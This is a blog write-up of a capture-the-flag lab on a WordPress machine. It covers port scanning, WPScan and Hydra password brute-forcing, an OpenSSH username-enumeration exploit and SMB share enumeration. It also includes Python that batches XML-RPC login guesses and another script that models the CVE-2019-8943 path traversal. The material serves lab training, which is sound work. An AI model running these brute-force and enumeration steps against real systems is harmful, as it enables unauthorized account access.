Blog

Posted by r3kind1e on August 2, 2023

Billy Joel made a Wordpress blog!

Kali Linux : 10.18.72.222

Target IP Address : 10.10.155.224

Task 1: Blog

Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea ;)


┌──(root㉿kali)-[~]
└─# cp /etc/hosts /etc/hosts.bak
                                                                                                                                                             
┌──(root㉿kali)-[~]
└─# cat /etc/hosts.bak
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

                                                                                                                                                             
┌──(root㉿kali)-[~]
└─# vim /etc/hosts    
                                                                                                                                                             
┌──(root㉿kali)-[~]
└─# cat /etc/hosts    
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.155.224   blog.thm
┌──(root㉿kali)-[~]
└─# nmap -Pn 10.10.155.224               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 03:18 EDT
Nmap scan report for 10.10.155.224
Host is up (0.27s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds
┌──(root㉿kali)-[~]
└─# nmap -Pn -p 22,80,139,445 -sC -sV 10.10.155.224
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 03:20 EDT
Nmap scan report for 10.10.155.224
Host is up (0.26s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Billy Joel's IT Blog – The IT blog
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 5.0
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2023-08-01T07:21:12+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-08-01T07:21:12
|_  start_date: N/A
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.28 seconds

http://blog.thm/2020/05/26/note-from-mom/

Two possible users found: Billy Joel and Karen Wheeler.

Found the WordPress admin login page: /wp-admin/

Database connection error; the only option was to restart the lab.

Kali Linux : 10.18.72.222

Target IP Address : 10.10.97.151

wpscan

┌──(root㉿kali)-[~]
└─# wpscan --url 10.10.97.151
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.97.151/ [10.10.97.151]
[+] Started: Tue Aug  1 03:56:04 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.97.151/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.97.151/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.97.151/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.97.151/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.97.151/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.97.151/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.97.151/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:11 <==============================================================================================================> (137 / 137) 100.00% Time: 00:00:11

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug  1 03:56:26 2023
[+] Requests Done: 181
[+] Cached Requests: 5
[+] Data Sent: 43.089 KB
[+] Data Received: 20.263 MB
[+] Memory used: 220.25 MB
[+] Elapsed time: 00:00:21

WordPress version 5.0 found; the matching exploit is: WordPress 5.0.0 - Image Remote Code Execution

Reading its usage notes, it needs a username and password. Use WPScan to run a password brute-force attack.

┌──(root㉿kali)-[~]
└─# wpscan --url 10.10.97.151 -e u --passwords /usr/share/wordlists/metasploit/unix_passwords.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.97.151/ [10.10.97.151]
[+] Started: Tue Aug  1 04:17:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.97.151/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.97.151/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.97.151/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.97.151/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.97.151/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.97.151/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.97.151/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:05 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:05

[i] User(s) Identified:

[+] bjoel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.97.151/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] kwheel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.97.151/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 4 user/s
Trying Billy Joel / vagrant Time: 00:14:38 <===========================================================================================================> (4036 / 4036) 100.00% Time: 00:14:38

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug  1 04:32:10 2023
[+] Requests Done: 4094
[+] Cached Requests: 8
[+] Data Sent: 2.064 MB
[+] Data Received: 2.85 MB
[+] Memory used: 157.762 MB
[+] Elapsed time: 00:15:09

Two usernames found, bjoel and kwheel:

bjoel : Billy Joel

kwheel : Karen Wheeler

http://blog.thm/wp-login.php

Trying common default credentials on the WordPress login form:

username : username

password : password

Invalid username

username : admin

password : password

Invalid username

Trying the following combinations:

username : bjoel

password : password

Incorrect password

username : kwheel

password : password

Incorrect password

Note that the form answers "Invalid username" for unknown accounts but "Incorrect password" for real ones; that difference is the "Login Error Messages" oracle WPScan used above to confirm both usernames.

Brute forcing failed and is too time-consuming.
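WPScan's password attack above went through xmlrpc.php. The following Python is an added example (not from this page and not WPScan's code) of the mechanism that makes XML-RPC the preferred brute-force channel: `system.multicall` lets one HTTP request carry many `wp.getUsersBlogs` login attempts, and each result comes back either as a fault struct (wrong password) or as a list of blogs (valid credentials). The server reply is constructed locally with placeholder guesses; nothing is sent over the network, and the blog.thm URLs in the sample only reuse the hostname from this room.

```python
import xmlrpc.client

# Added example: builds the batched login probe a WordPress password attack
# sends to xmlrpc.php and parses the reply. No network access; the server
# reply below is constructed by hand with placeholder passwords.

XMLRPC_METHOD = "wp.getUsersBlogs"


def build_multicall(username, passwords):
    """Pack one wp.getUsersBlogs call per password guess into a single
    system.multicall request body (returned as XML text)."""
    calls = [
        {"methodName": XMLRPC_METHOD, "params": [username, pw]}
        for pw in passwords
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def decode_request(xml_text):
    """Decode a request body back into (method, [(methodName, params), ...]).
    Useful for checking what a batch really contains before sending it."""
    (calls,), method = xmlrpc.client.loads(xml_text)
    return method, [(c["methodName"], c["params"]) for c in calls]


def parse_multicall_response(xml_text, username, passwords):
    """Pair each multicall result with the guess that produced it.

    A wrong password comes back as a fault struct (faultCode/faultString);
    a correct one comes back as a list of blog descriptors."""
    (results,), _method = xmlrpc.client.loads(xml_text)
    if len(results) != len(passwords):
        raise ValueError("result count does not match the guesses sent")
    valid = []
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # fault struct: this guess was rejected
        valid.append((username, pw))
    return valid


# Constructed sample reply for three guesses, with the second one accepted.
# The guesses are placeholders, not real credentials for any host.
GUESSES = ["guess1", "guess2", "guess3"]
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    (
        [
            {"faultCode": 403, "faultString": "Incorrect username or password."},
            [{"isAdmin": True, "url": "http://blog.thm/", "blogid": "1",
              "blogName": "Billy Joel's IT Blog",
              "xmlrpc": "http://blog.thm/xmlrpc.php"}],
            {"faultCode": 403, "faultString": "Incorrect username or password."},
        ],
    ),
    methodresponse=True,
)


def demo():
    """Run the round trip against the constructed reply."""
    return parse_multicall_response(SAMPLE_RESPONSE, "bjoel", GUESSES)


if __name__ == "__main__":
    print(build_multicall("bjoel", GUESSES))
    print(demo())
```

Because every guess in the batch is evaluated server-side for the cost of one request, a server that leaves xmlrpc.php reachable and does not throttle multicall is far cheaper to brute-force than wp-login.php; that is also why blocking or rate-limiting xmlrpc.php is the usual hardening step.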

┌──(root㉿kali)-[~/Downloads]
└─# cat users.txt       
bjoel
kwheel
┌──(root㉿kali)-[~/Downloads]
└─# wpscan --url 10.10.97.151 -U users.txt -P /usr/share/wordlists/rockyou.txt 

OpenSSH 2.3 < 7.7 - Username Enumeration : CVE-2018-15473

┌──(root㉿kali)-[~/Downloads]
└─# searchsploit OpenSSH 7.6p1
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                   | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                             | linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2)                                                                                       | linux/remote/45939.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit -m 45233     
  Exploit: OpenSSH 2.3 < 7.7 - Username Enumeration
      URL: https://www.exploit-db.com/exploits/45233
     Path: /usr/share/exploitdb/exploits/linux/remote/45233.py
    Codes: CVE-2018-15473
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/Downloads/45233.py

The script above does not run under Python 3, so I used a Python 3 port of the exploit.

exploit 45233.py fixed for python 3

┌──(root㉿kali)-[~/Downloads]
└─# python 45233.1.py 
usage: 45233.1.py [-h] [--port PORT] [--threads THREADS] [--outputFile OUTPUTFILE] [--outputFormat {list,json,csv}] (--username USERNAME | --userList USERLIST) hostname
45233.1.py: error: the following arguments are required: hostname
┌──(root㉿kali)-[~/Downloads]
└─# python 45233.1.py --outputFile output.txt  --userList users.txt  10.10.97.151
[+] Results successfully written to output.txt in List form.
┌──(root㉿kali)-[~/Downloads]
└─# cat output.txt      
bjoel is a valid user!
kwheel is a valid user!

The target SSH server has two valid users: bjoel and kwheel.

┌──(root㉿kali)-[~/Downloads]
└─# hydra -L users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://10.10.97.151  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-01 06:57:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2018 login tries (l:2/p:1009), ~127 tries per task
[DATA] attacking ssh://10.10.97.151:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 1891 to do in 00:15h, 15 active
[STATUS] 103.67 tries/min, 311 tries in 00:03h, 1708 to do in 00:17h, 15 active
[STATUS] 97.14 tries/min, 680 tries in 00:07h, 1339 to do in 00:14h, 15 active
[STATUS] 98.83 tries/min, 1186 tries in 00:12h, 833 to do in 00:09h, 15 active
[STATUS] 98.65 tries/min, 1677 tries in 00:17h, 342 to do in 00:04h, 15 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-01 07:18:28

SSH brute force failed.

http://10.10.97.151/wp-content/uploads/

Check whether Apache allows the PUT method.

┌──(root㉿kali)-[~]
└─# nmap --script http-methods 10.10.97.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 07:09 EDT
Nmap scan report for blog.thm (10.10.97.151)
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-methods: 
|_  Supported Methods: GET HEAD POST
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 84.55 seconds

Only GET, HEAD and POST are supported.

Out of ideas, I glanced at the lab's tag: cve-2019-8943

Wordpress: CVE-2019-8943: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)


WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
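As an added illustration of the primitive the advisory describes (a simplified model written for this page, not WordPress's own code): an extension check that inspects only how the filename ends lets a name like `evil.jpg?/../../../../themes/twentynineteen/evil.jpg` through, while the directory part of that name is joined onto the uploads path without normalisation. `UPLOADS_DIR`, the theme directory name and the `cropped-` naming are assumptions for the demo; the hardened variant beside it normalises the result and refuses anything that resolves outside the uploads directory.

```python
import posixpath
import re

# Added example modelling the CVE-2019-8943 primitive: an attachment name that
# satisfies an image-extension check but carries "../" in its directory part.
# Simplified model, not WordPress code. UPLOADS_DIR is an assumed path.

UPLOADS_DIR = "/var/www/html/wp-content/uploads"
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif)$", re.IGNORECASE)


def passes_image_check(attached_file):
    """Extension check that only looks at how the name ends."""
    return IMAGE_EXT.search(attached_file) is not None


def crop_path_unchecked(attached_file):
    """Destination of a cropped copy: the attachment's directory part is
    joined onto the uploads dir and the basename gets a 'cropped-' prefix.
    Nothing here normalises or validates the directory part."""
    directory, basename = posixpath.split(attached_file)
    return posixpath.join(UPLOADS_DIR, directory, "cropped-" + basename)


def resolved_destination(attached_file):
    """Where the unchecked path actually lands once '..' is collapsed."""
    return posixpath.normpath(crop_path_unchecked(attached_file))


def is_contained(attached_file):
    """True if the resolved destination stays under UPLOADS_DIR."""
    return resolved_destination(attached_file).startswith(UPLOADS_DIR + "/")


def crop_path_contained(attached_file):
    """Hardened variant: normalise first and refuse any destination that
    resolves outside the uploads directory."""
    resolved = resolved_destination(attached_file)
    if not resolved.startswith(UPLOADS_DIR + "/"):
        raise ValueError("destination escapes uploads directory: " + resolved)
    return resolved


# Constructed attacker-controlled value in the shape the advisory describes:
# two image extensions with "../" sequences between them. Four "../" climb
# from uploads/2020/05/<name>/ up to wp-content/.
EVIL = "2020/05/evil.jpg?/../../../../themes/twentynineteen/evil.jpg"
BENIGN = "2020/05/photo.jpg"

if __name__ == "__main__":
    for name in (BENIGN, EVIL):
        print(name)
        print("  passes extension check:", passes_image_check(name))
        print("  unchecked destination: ", crop_path_unchecked(name))
        print("  resolves to:           ", resolved_destination(name))
        print("  contained in uploads:  ", is_contained(name))
```

The model covers only the filesystem half of the bug: the name ends in `.jpg`, so the extension check passes, yet the `../` components in the middle walk the write out of `uploads/` and into a theme directory. The `?` is kept only because the advisory's example contains it; what it does to the image fetch in the real bug is not modelled here.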


┌──(root㉿kali)-[~/Downloads]
└─# searchsploit --cve CVE-2019-8943
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Core 5.0 - Remote Code Execution                                                                                                                | php/webapps/46511.js
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)                                                                                               | php/remote/46662.rb
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit --cve CVE-2019-8943 -w
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
 Exploit Title                                                                                                                                 |  URL
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
WordPress Core 5.0 - Remote Code Execution                                                                                                     | https://www.exploit-db.com/exploits/46511
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)                                                                                    | https://www.exploit-db.com/exploits/46662
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results

WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)

WordPress Crop-image Shell Upload


This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.


This module also needs a username and password. So how do we find passwords for bjoel or kwheel?

Try enumerating Samba:

┌──(root㉿kali)-[~]
└─# enum4linux -a -u bjoel 10.10.97.151
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Aug  1 08:35:14 2023

 =========================================( Target Information )=========================================
                                                                                                                                                             
Target ........... 10.10.97.151                                                                                                                              
RID Range ........ 500-550,1000-1050
Username ......... 'bjoel'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.97.151 )============================
                                                                                                                                                             
                                                                                                                                                             
[+] Got domain/workgroup name: WORKGROUP                                                                                                                     
                                                                                                                                                             
                                                                                                                                                             
 ================================( Nbtstat Information for 10.10.97.151 )================================
                                                                                                                                                             
Looking up status of 10.10.97.151                                                                                                                            
        BLOG            <00> -         B <ACTIVE>  Workstation Service
        BLOG            <03> -         B <ACTIVE>  Messenger Service
        BLOG            <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 10.10.97.151 )===================================
                                                                                                                                                             
                                                                                                                                                             
[+] Server 10.10.97.151 allows sessions using username 'bjoel', password ''                                                                                  
                                                                                                                                                             
                                                                                                                                                             
 ================================( Getting domain SID for 10.10.97.151 )================================
                                                                                                                                                             
Bad SMB2 (sign_algo_id=1) signature for message                                                                                                              
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] 68 95 11 80 3C 6E 5B BA   23 10 AA EC 6E C4 FA 78   h...<n[. #...n..x
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

[+] Can't determine if host is part of domain or part of a workgroup                                                                                         
                                                                                                                                                             
                                                                                                                                                             
 ===================================( OS information on 10.10.97.151 )===================================
                                                                                                                                                             
                                                                                                                                                             
[E] Can't get OS info with smbclient                                                                                                                         
                                                                                                                                                             
                                                                                                                                                             
[+] Got OS info for 10.10.97.151 from srvinfo:                                                                                                               
Bad SMB2 (sign_algo_id=1) signature for message                                                                                                              
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] 8D B7 DF 7A 3B A3 46 90   44 04 C5 E1 39 FF DC 1C   ...z;.F. D...9...
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 10.10.97.151 )=======================================
                                                                                                                                                             
                                                                                                                                                             
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                                                         
                                                                                                                                                             
                                                                                                                                                             

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                                                          
                                                                                                                                                             
                                                                                                                                                             
 =================================( Share Enumeration on 10.10.97.151 )=================================
                                                                                                                                                             
                                                                                                                                                             
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        BillySMB        Disk      Billy's local SMB Share
        IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            BLOG

[+] Attempting to map shares on 10.10.97.151                                                                                                                 
                                                                                                                                                             
//10.10.97.151/print$   Mapping: DENIED Listing: N/A Writing: N/A                                                                                            
//10.10.97.151/BillySMB Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:                                                                                                                               
                                                                                                                                                             
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                                                                   
//10.10.97.151/IPC$     Mapping: N/A Listing: N/A Writing: N/A

 ============================( Password Policy Information for 10.10.97.151 )============================
                                                                                                                                                             
                                                                                                                                                             

[+] Attaching to 10.10.97.151 using bjoel

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] BLOG
        [+] Builtin

[+] Password Info for Domain: BLOG

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 



[E] Failed to get password policy with rpcclient                                                                                                             
                                                                                                                                                             
                                                                                                                                                             

 =======================================( Groups on 10.10.97.151 )=======================================
                                                                                                                                                             
                                                                                                                                                             
[+] Getting builtin groups:                                                                                                                                  
                                                                                                                                                             
                                                                                                                                                             
[+]  Getting builtin group memberships:                                                                                                                      
                                                                                                                                                             
                                                                                                                                                             
[+]  Getting local groups:                                                                                                                                   
                                                                                                                                                             
                                                                                                                                                             
[+]  Getting local group memberships:                                                                                                                        
                                                                                                                                                             
                                                                                                                                                             
[+]  Getting domain groups:                                                                                                                                  
                                                                                                                                                             
                                                                                                                                                             
[+]  Getting domain group memberships:                                                                                                                       
                                                                                                                                                             
                                                                                                                                                             
 ==================( Users on 10.10.97.151 via RID cycling (RIDS: 500-550,1000-1050) )==================
                                                                                                                                                             
                                                                                                                                                             
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                                                                    
                                                                                                                                                             
                                                                                                                                                             
 ===============================( Getting printer info for 10.10.97.151 )===============================
                                                                                                                                                             
Bad SMB2 (sign_algo_id=1) signature for message                                                                                                              
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] CE 0F 02 31 39 6B 30 1D   20 73 E8 B8 FF 61 D1 3B   ...19k0.  s...a.;
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Aug  1 08:36:07 2023

The BillySMB share can be listed!

        Sharename       Type      Comment
        ---------       ----      -------
        BillySMB        Disk      Billy's local SMB Share

//10.10.97.151/BillySMB Mapping: OK Listing: OK Writing: N/A

┌──(root㉿kali)-[~/Downloads]
└─# smbclient //10.10.97.151/BillySMB -U bjoel
Password for [WORKGROUP\bjoel]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug  1 05:45:02 2023
  ..                                  D        0  Tue May 26 13:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020

                15413192 blocks of size 1024. 9779380 blocks available
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get tswift.mp4
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \> get check-this.png
getting file \tswift.mp4 of size 1236733 as tswift.mp4 getting file \check-this.png of size 3082 as check-this.png (1.1 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> put /root/Downloads/users.txt users.txt
putting file /root/Downloads/users.txt as \users.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
  .                                   D        0  Tue Aug  1 09:17:31 2023
  ..                                  D        0  Tue May 26 13:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  users.txt                           A       13  Tue Aug  1 09:17:32 2023
  check-this.png                      N     3082  Tue May 26 14:13:43 2020

                15413192 blocks of size 1024. 9779376 blocks available
